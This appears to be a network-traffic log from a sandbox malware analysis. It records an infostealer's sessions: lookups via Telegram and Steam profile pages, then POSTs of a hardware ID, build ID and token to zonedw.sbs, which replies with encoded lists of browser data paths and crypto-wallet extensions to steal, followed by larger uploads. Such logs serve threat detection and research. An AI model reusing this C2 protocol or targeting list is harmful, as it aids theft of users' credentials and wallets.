2024-12-13 17:53:41 UTC	86	OUT	GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:41 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 13 Dec 2024 17:53:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12313 Connection: close Set-Cookie: stel_ssid=0f16be3cd5b64bfc24_1392832568208400914; expires=Sat, 14 Dec 2024 17:53:41 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-13 17:53:41 UTC	12313	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49896	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:44 UTC	230	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:53:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49902	23.55.153.106	443	6328	C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:46 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-13 17:53:46 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 13 Dec 2024 17:53:46 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=f756dce55d7f9bac8289d90a; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-13 17:53:46 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-13 17:53:46 UTC	10097	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>
2024-12-13 17:53:46 UTC	1089	IN	Data Raw: 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e 65 72 73 20 69 6e 20 74 68 65 20 55 53 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 75 6e 74 72 69 65 73 2e 3c 62 72 2f 3e 53 6f 6d 65 20 67 65 6f 73 70 61 74 69 61 6c 20 64 61 74 61 20 6f 6e 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 Data Ascii: heir respective owners in the US and other countries.<br/>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49904	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:46 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----16FKXLF3EKF37YUAS0RI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:46 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 46 4b 58 4c 46 33 45 4b 46 33 37 59 55 41 53 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 37 30 30 39 37 31 45 35 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 46 4b 58 4c 46 33 45 4b 46 33 37 59 55 41 53 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 36 46 4b 58 4c 46 33 45 4b 46 33 37 59 55 41 53 30 52 49 2d 2d 0d Data Ascii: ------16FKXLF3EKF37YUAS0RIContent-Disposition: form-data; name="hwid"83700971E58A3788952882-a33c7340-61ca------16FKXLF3EKF37YUAS0RIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------16FKXLF3EKF37YUAS0RI--
2024-12-13 17:53:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:53:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:53:47 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|df119d3fe17ef8b1d812cc2062d24500\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49913	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:49 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JWB1NYCJM7G4EUKNOHVA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 Data Ascii: ------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------JWB1NYCJM7G4EUKNOHVACont
2024-12-13 17:53:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:53:50 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49922	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:53 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 Data Ascii: ------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5PP8Q9ZUA1NYMY5FCTR1Cont
2024-12-13 17:53:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:53:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:53:54 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49928	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:55 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----TJW47QQ1NYCJM7GVAIE3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:55 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 54 4a 57 34 37 51 51 31 4e 59 43 4a 4d 37 47 56 41 49 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 34 37 51 51 31 4e 59 43 4a 4d 37 47 56 41 49 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 34 37 51 51 31 4e 59 43 4a 4d 37 47 56 41 49 45 33 0d 0a 43 6f 6e 74 Data Ascii: ------TJW47QQ1NYCJM7GVAIE3Content-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------TJW47QQ1NYCJM7GVAIE3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------TJW47QQ1NYCJM7GVAIE3Cont
2024-12-13 17:53:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:53:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:53:56 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49935	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:53:58 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7YMYCBSR1N7YUAS2V3OZ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 7273 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:53:58 UTC	7273	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 5a 0d 0a 43 6f 6e 74 Data Ascii: ------7YMYCBSR1N7YUAS2V3OZContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------7YMYCBSR1N7YUAS2V3OZContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7YMYCBSR1N7YUAS2V3OZCont
2024-12-13 17:53:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:53:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49937	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:00 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VA1VKFU3EKF3E37900ZM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:00 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------VA1VKFU3EKF3E37900ZMContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------VA1VKFU3EKF3E37900ZMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VA1VKFU3EKF3E37900ZMCont
2024-12-13 17:54:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:54:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49951	172.217.19.228	443	4332	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:04 UTC	603	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlKHLAQiFoM0BCNy9zQEIj8rNAQi5ys0BCKLRzQEIitPNAQik1s0BCPTWzQEIp9jNAQj5wNQVGPXJzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
